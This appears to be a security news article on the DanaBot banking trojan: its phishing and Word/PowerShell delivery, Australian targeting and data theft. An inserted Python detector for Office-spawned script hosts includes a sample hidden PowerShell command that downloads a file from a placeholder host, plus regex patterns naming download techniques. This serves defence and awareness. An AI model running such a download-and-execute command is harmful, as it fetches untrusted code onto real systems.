DanaBot, a new banking trojan that primarily targets users in Australia, has appeared out of nowhere.
This malware is written in Delphi and is currently under development. So far it has been operated by only one malware developer, dubbed TA547.
This malware developer seems to have bought banking malware from other malware developers and operators.
TA547 has been active since Nov 2017 and has distributed other malware variants including Gootkit, Ursnif, Panda Banker, Atmos, Mazar Bot, Corebot, as well as the Red Alert Android malware. Countries previously targeted by this malware developer include Germany, UK, Australia, and Italy.
There is some evidence that the malware might also have been spread by other malware developers: a few of the samples discovered suggest this.
Phishing emails containing malicious URLs are used to distribute DanaBot. These URLs redirect the target to a Word document hosted on a third-party site.
This malicious document, when activated, downloads the DanaBot trojan by utilizing a PowerShell command.
The document also contains stolen and copied branding that claims to be protected by a security vendor.
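A detection-side illustration of the delivery step above, added here and not taken from the original article or from Proofpoint: it flags process-creation events in which an Office application starts a script host, and raises the severity when the command line shows download or hidden-window hints. The pipe-separated log format, host names, process lists and sample events are all constructed assumptions.

```python
import re

# Assumed watch lists: Office parents and the script hosts they rarely need.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe"}
# Command-line hints of a download or of hidden/encoded execution.
DOWNLOAD_HINTS = re.compile(
    r"downloadfile|downloadstring|net\.webclient|invoke-webrequest|"
    r"start-bitstransfer|-enc\w*\s|-w\w*\s+hidden|https?://",
    re.IGNORECASE,
)

# Constructed sample events: host|parent image|child image|command line
SAMPLE_EVENTS = r"""
WS01|C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell.exe -w hidden -c "(New-Object Net.WebClient).DownloadFile('http://example.invalid/p','p.bin')"
WS02|C:\Windows\explorer.exe|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell.exe -File C:\Scripts\inventory.ps1
WS03|C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE|C:\Windows\System32\cmd.exe|cmd.exe /c dir
WS04|C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE|C:\Windows\splwow64.exe|splwow64.exe 8192
""".strip().splitlines()

def image_name(path):
    """Lower-cased file name of a Windows image path."""
    return path.strip().strip('"').replace("/", "\\").rsplit("\\", 1)[-1].lower()

def classify(line):
    """Return (host, severity) for one event; severity is None when benign."""
    parts = line.split("|", 3)  # the command line itself may contain '|'
    if len(parts) != 4:
        raise ValueError(f"malformed event: {line!r}")
    host, parent, child, cmdline = parts
    if image_name(parent) not in OFFICE_PARENTS or image_name(child) not in SCRIPT_HOSTS:
        return host, None
    return host, "high" if DOWNLOAD_HINTS.search(cmdline) else "medium"

def triage(lines):
    """Return alerts only, highest severity first."""
    alerts = [a for a in (classify(l) for l in lines if l.strip()) if a[1]]
    return sorted(alerts, key=lambda a: a[1] != "high")

if __name__ == "__main__":
    for host, severity in triage(SAMPLE_EVENTS):
        print(f"{severity:6} {host}")
```
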
The trojan also checks the target’s location and only attacks users in Australia. The trojan comes with spying capabilities, i.e., it steals banking IDs and passwords, credit card details, etc.
It also steals detailed system information such as the system's IP address, the operating system version, and many similar details.
It also collects files stored on the hard disk and a screenshot of the user’s desktop, all of which it sends to the command and control center.
“Currently, this trojan is under development and there seem to be two versions. We observed the first in a campaign around May 6 and 7 while the second appeared around May 29.
However, we found even earlier samples via pivots in malware repositories that date from the middle of April but we have not seen these in the wild,” Proofpoint researchers, who discovered DanaBot, said in a blog.
DanaBot currently targets users of several popular email clients, including Outlook and Windows Live Mail. The malware also targets users of instant messengers such as Trillian, Digsby, and Miranda.
Tips to prevent viruses and malware from infecting your system:
- Enable your popup blocker: Pop-ups and ads on websites are the tactic most commonly adopted by cybercriminals or developers whose core intention is to spread malicious programs. So, avoid clicking on untrusted sites, software offers, pop-ups, etc., and install a powerful ad blocker for Chrome, Mozilla, and IE.
- Keep your Windows updated: To avoid such infections, we recommend that you always keep your system updated through automatic Windows Update. By doing this you can keep your device free from viruses. According to the survey, outdated/older versions of the Windows operating system are an easy target.
- Third-party installation: Try to avoid freeware download websites, as they usually bundle additional software with any installer or stub file.
- Regular backup: Regular, periodic backups help you keep your data safe in case the system is infected by a virus or any other infection. Thus, always back up important files regularly to a cloud drive or an external hard drive.
- Always have an antivirus: Precaution is better than cure. We recommend that you install an antivirus like ITL Total Security or a good malware removal tool.